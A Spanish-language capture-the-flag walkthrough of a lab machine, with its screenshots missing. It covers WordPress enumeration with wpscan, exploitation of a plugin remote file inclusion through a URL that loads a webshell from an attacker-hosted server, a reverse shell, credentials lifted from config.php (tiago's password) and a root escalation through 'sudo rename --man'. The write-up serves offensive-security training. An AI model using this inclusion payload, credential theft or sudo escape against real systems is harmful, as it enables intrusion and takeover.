Hacemos el escaneo con nmap:

Esto es lo que corre dentro del puerto 80:

Hacemos fuzzing y vemos que corre un directorio llamado wordpress:

Accedemos a dicho directorio, donde vemos que se trata de un wordpress, pero que no le carga correctamente la información:

Por lo que vemos el código fuente y detectamos un dominio:

Lo añadimos al /etc/hosts:

Y ya nos carga bien la página:

Procedemos a enumerar posibles usuarios y plugins de este wordpress, pero debemos de activar el modo agresivo:

wpscan --url http://192.168.0.37/wordpress -e p --plugins-detection aggressive

Y tenemos la siguiente ruta:

Y detectamos la versión:

Y tenemos en exploitdb un exploit de remote file inclusion:

Y por aquí tenemos las instrucciones donde se nos dice que tenemos que estar alojando en un servidor web el comando malicioso que queramos ejecutar en la máquina víctima:

Por lo que nos preparamos el servidor web malicioso donde vamos a estar alojando una webshell:

Lo pegamos:

Pero no funciona, y vemos en la petición del servidor de python que busca otro archivo:

Por lo que vamos a renombrar la webshell a este mismo nombre:

Volvemos a levantar un servidor http y hacemos la petición con el nuevo nombre:

Y ahora vemos el resultado del comando:

http://remote.nyx/wordpress/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://192.168.0.32:8000/shell.php&cmd=whoami

Obtenemos la reverse shell de revshells url encodeada:

Lo pegamos y obtenemos la reverse shell:

Y dentro del archivo config.php en el directorio wordpress nos encontramos con unas credenciales:

Tenemos la contraseña del usuario Tiago:

tiago:WPr00t3d123!

Tenemos el siguiente binario que podemos ejecutarlo como root:

Si ejecutamos el menú de ayuda del programa, vemos que podemos ejecutar las páginas man como root:

Lo ejecutamos y una vez dentro lanzamos el comando de una bash:

sudo /usr/bin/rename --man

Y ya somos root: